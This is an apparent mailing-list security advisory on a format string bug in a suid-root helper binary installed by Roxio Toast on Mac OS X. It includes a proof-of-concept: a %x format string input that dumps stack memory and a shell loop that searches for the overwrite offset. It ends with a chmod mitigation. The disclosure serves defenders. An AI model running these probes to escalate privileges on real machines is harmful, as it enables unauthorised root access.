<<< Date Index >>>     <<< Thread Index >>>

Possible local root vulnerability in Roxio Toast on Mac OS X

Possible local root vulnerability in Roxio Toast on Mac OS X
By fintler <fintler@xxxxxxxxx>

Summary:

There is a format string bug in the binary (/Library/Application
Support/Roxio/TDIXSupport). It is installed suid root by default and
may be exploited by finding the offset and overwriting the stack with
malicious instructions.

Example:
fintler@haven:/Library/Application Support/Roxio$ ls -l TDIXSupport 
-rwsr-sr-x  1 root  wheel  14260  5 Nov  2003 TDIXSupport
fintler@haven:/Library/Application Support/Roxio$ ./TDIXSupport
"AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
kextload: /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA905d2ce23a206e6f20737563682062756e646c652066696c652065789058a58c61e0403b4300090000ef0bfffee90bffff44064b26064b26064b2d061e2503032b09058a52cbfffef10440222229058a5f01100061e250fefefeff1173004a0ffffffff61e0409058e868bfffef10440282449058ea9c90197d3801696246a064b2d02314664b06061e040a00011ac3a000003032b09057df58bfffef303007a0103009f0bffff44064b2603032b03009f0030118090597b38bfffef802402824290597bc09058f61cbfffef80304b903032b09058f61cbfffef80090580a2416904017a01900e064b2d040300e60300e60016964b26000304b903032b09058f61cbffff000240222249058f74c0030083000bffff00048022422901b7ab4304b908ffffffff300e60624270a0193140a01900e062427090197d38bffff0502802244803009f003008003008101013008303032b0bffff48024022224474c00301520bffff2e00300d903817a01900e011805300a0192e946242702f4c6962726172792f4170706c69636174696f6e20537570706f72742f526f78696f2f4141414141:
no such bundle file exists
can't add kernel extension /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
(file access/permissions) (run kextload on this kext with -t for
diagnostic output)
fintler@haven:/Library/Application Support/Roxio$
for((i=1;i<1000;i++));do echo -n "$i "&&./TDIXSupport
"AAAAAAAAAAAAAAAAAAAAAAA%$i\$x";done|grep 4141 2>/dev/null
etc...

Solution:
A possible way of fixing this issue is to change the permissions of
the binary to non-suid root by issuing the following command:
'sudo chmod 0755 /Library/Application Support/Roxio/TDIXSupport'
This will most likely disable some functionality of Toast.

EOF